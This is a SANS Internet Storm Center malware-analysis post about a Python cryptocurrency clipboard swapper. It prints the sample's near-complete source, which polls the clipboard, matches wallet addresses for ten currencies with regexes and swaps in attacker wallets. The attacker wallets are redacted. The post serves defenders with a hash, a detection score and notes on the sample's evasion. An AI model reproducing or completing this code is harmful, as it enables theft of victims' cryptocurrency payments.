[SANS ISC] Cryptocurrency Clipboard Swapper Delivered With Love , (Mon, Aug 30th)

Be careful if you’re a user of cryptocurrencies. My goal is not to re-open a debate about them and their associated financial risks. No, I’m talking here about technical risk. Wallet addresses are long strings of characters that are pretty impossible to use manually. It means that you’ll use your clipboard to copy/paste your wallets to perform payments. But some malware monitors your clipboard for “interesting data” (like wallet addresses) and tries to replace it with another one. If you perform a payment operation, it means that you will transfer some BTC or XMR to the wrong wallet, owned by the attacker.

Yesterday, I spotted a simple malicious Python script that performs exactly this.The script SHA256 is ab1ef55c9e4266e5a2b0870deefb609d3fa9d2c0ee8e0d34a2d7c080c84ca343 and has a current score of 17/57[1]. The main code is obfusctated in a Base64-encode variable.

As you can see in the code below, this script is delivered with love to the victim! Random love quotes are added in the script to defeat some automated analysis. The script is based on the pyperclip[2] library that is common in the Python ecosystem. It allows manipulating the clipboard. The fact that the script does not test if the module is already installed makes me think that this script is part of a framework or has dependencies with others.

The clipboard is controlled at regular intervals and searched for classic cryptocurrencies through regular expressions. If there is a match, the clipboard content is swapped with a rogue wallet. Two are two defined in this sample.

Here is the code:

#If I know what love is
import pyperclip
#I fell in love with her courage
import json
#If you live to be a hundred
import time
#A man is already halfway in love
import re
#Women are meant to be loved
import argparse
#You make me want to be a better man
from datetime import datetime
#Thinking of you keeps me

def main():
# infinite keeps me
while 1:
now = datetime.now()

time.sleep(2) #Let me love you
#There is never a time or place for true love
user_clipboard = pyperclip.paste()
#true love
crypto_found = spiff(
user_clipboard
)
replacement_address = replace(
user_clipboard, crypto_found
)
#love is so short, forgetting is so long

master_addresses = {
“btc”: “xxxxxxxxxx”,
“xmr”: “null”,
“eth”: “xxxxxxxxxx”,
“dash”: “null”,
“xrp”: “null”,
“doge”: “null”,
“ada”: “null”,
“lite”: “null”,
“dot”: “null”,
“tron”: “null”
}
#cares and fears
def replace(user_clipboard, crypto_found):

if crypto_found != 0 and master_addresses[crypto_found] != “null”:
pyperclip.copy(master_addresses[crypto_found])
return str(master_addresses[crypto_found])
return 0
#until love’s vulnerable

def spiff(user_clipboard):
crypto_regex_match = {
“btc”: “^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$”,
“xmr”: “4[0-9AB][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{93}”,
“eth”: “^0x[a-fA-F0-9]{40}$”,
“dash”: “^X[1-9A-HJ-NP-Za-km-z]{33}$”,
“xrp”: “^r[0-9a-zA-Z]{24,34}$”,
“doge”: “^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$”,
“ada”: “^D[A-NP-Za-km-z1-9]{35,}$”,
“lite”: “^[LM3][a-km-zA-HJ-NP-Z1-9]{25,34}$”,
“tron”: “^T[a-zA-Z0-9]{33}$”,
“dot”: “^[1-9A-HJ-NP-Za-km-z]*$”,
}
#I love you without knowing how
for k, v in crypto_regex_match.items():
if bool(re.search(v, user_clipboard)):
return str(k)

return 0
#A purpose of human life

main()
#Love is always patient and kind

I checked the two wallets in the script but then don’t show any transaction at this time.

[Update 1]

Brian Krebs contacted me to report a story he posted a few days ago about a real case of such a clipboard swapping technique[3]. This article is worth reading!

[1] https://www.virustotal.com/gui/file/ab1ef55c9e4266e5a2b0870deefb609d3fa9d2c0ee8e0d34a2d7c080c84ca343/detection
[2] https://pypi.org/project/pyperclip/
[3] https://krebsonsecurity.com/2021/08/man-robbed-of-16-bitcoin-sues-young-thieves-parents/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Source: Read More (SANS Internet Storm Center, InfoCON: green)

You might be interested in …

[ZDNet] A cloud company asked security researchers to look over its development systems. Here’s what they found

All posts, ZDNet

With supply chain attacks increasingly common, cloud companies are looking to tighten their defences. Source: Read More (Latest topics for ZDNet in Security)

Read More

[SANS ISC] Strings Analysis: VBA & Excel4 Maldoc, (Sat, Sep 25th)

All posts, Sans-ISC

Malware analysis is difficult. But there is one method that everybody can follow, even without command-line skills: strings analysis. This method consists of running a tool on a binary file, like a maldoc, to extract all plaintext strings. There are command-line tools to do this, and even GUI tools. Of course, there are many ways […]

Read More

[ThreatPost] The Gig Economy Creates Novel Data-Security Risks

All posts, ThreatPost

Enterprises are embracing on-demand freelance help — but the practice, while growing, opens up entirely new avenues of cyber-risk. Source: Read More (Threatpost)

Read More

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.